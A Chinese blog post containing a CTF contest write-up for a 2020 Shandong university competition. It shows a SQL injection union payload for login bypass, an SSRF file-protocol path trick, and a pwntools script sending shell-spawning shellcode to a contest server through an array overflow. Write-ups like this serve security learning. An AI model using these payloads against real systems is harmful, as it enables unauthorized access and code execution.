-wp -学习笔记

第三届山东省大学生网络技术大赛writeup

writeup

Posted by mr_king on November 18, 2020

控制查询返回值

下载源码,读取这存在sql注入

$query = @mysql_fetch_array(mysql_query("select pw  from users where user='$user'"));

BUrLlj.md.png

构造payload:

user='union select 'c4ca4238a0b923820dcc509a6f75849b'--+&pass=1

BUDV29.md.png

simplessrf

ssrf题:

利用file协议读取文件

image-20201031134204732

直接用file协议读取文件

构造file://@127.0.0.1/../flag.txt

显示获取源码失败,用%23将后面注释

payload:

file://@127.0.0.1/../flag.txt%23

game

程序存在数组越界,能够通过越界实现执行我们的shellcode

通过调试可以得到exp如下:

from pwn import *

context(arch = 'amd64', os = 'linux', log_level = 'debug')

#c = process('./game')
c = remote('106.2.25.10',50005)

#gdb.attach(c,'b * 0x400855')

sc = asm(shellcraft.sh())

c.recvuntil('Divide two numbers\n')

c.sendline('9')

#c.recvuntil('You chose: %d\nEnter two numbers to do math with, e.g. [3 4]\n')
sleep(1)

c.sendline(p64(0x6010c8) + sc)

c.interactive()

cm50

根据程序中的比较逻辑,可以得到解密脚本:

# -*- coding: UTF-8 -*-

str = 'sffxl{gdv}gwfcaslydRgdoepsckaNDMSaITPNsmr1_=2cdsef66246087138'
array = [1,4,14,10,5,36,23,42,13,19,28,13,27,39,48,41,42,26,20,59,4,0]

flag = ''

for i in range(17):
    idx = array[i]
    flag += str[idx]

flag += chr(49)
flag += chr(48)
flag += chr(50)
flag += chr(52)
flag += chr(125)
print flag

baby

已知e N c的RSA

直接CTF-RSA-TOOL

python2 solve.py -e 3 -c 3442467842482561323703237574537907554035337622762971103210557480050349359873041624336261782731509068910003360547049942482415036862904844600484976674423604861710166033558576921438068555951948966099658902606725292551952345193132973996288566246138708754810511646811362017769063041425115712305629748341207792305694590742066971202523405301561233341991037374101265623265332070787449332991792097090044761973705909217137119649091313457206589803479797894924402017273543719924849592070328396276760381501612934039653 -N 691316677109436623113422493782665795857921917893759942123087462879884062720557906429183155859597756890896192044003240821906332575292476160072039505771794531255542244123516929671277306361467074545720823735806308003091983427678300287709469582282466572230066580195227278214776280213722215953097747453437289734469454712426107967188109548966907237877840316009828476200388327329144783877033491238709954473809991152727333616022406517443130542713167206421787038596312975153165848625721911080561242646092299016802662913017071685740548699163836007474224715426587609549372289181977830092677128368806113131459831182390520942892670696447128631485606579943885812260640805756035377584155135770155915782120025116486061540105139339655722904721294629149025033066823599823964444620779259106176913478839370100891213072100063101232635183636552360952762838656307300621195248059253614745118852163569388418086291748805100175008658387803878200034840215506516715640621165661642177371863874586069524022258642915100615596032443145034847031564356671559179212705466145609698475546210994748949121359853094247990533075004393534565421776468785821261291309463205314057882016266066365636018084499158806717036972590848458891019171583268920180691221168453612029698510271

morse

直接将mp3文件拖入Audacity,可以看到摩斯电码

..... -... -.-. ----. ..--- ..... -.... ....- ----. -.-. -... ----- .---- ---.. ---.. ..-. ..... ..--- . -.... .---- --... -.. --... ----- ----. ..--- ----. .---- ----. .---- -.-.

解码即可。

CATALOG
    FEATURED TAGS
    -web -学习笔记 -xss -MISC -杂项 -sql注入 -PHP -ctf -命令执行 -ssti -wp -java
    FRIENDS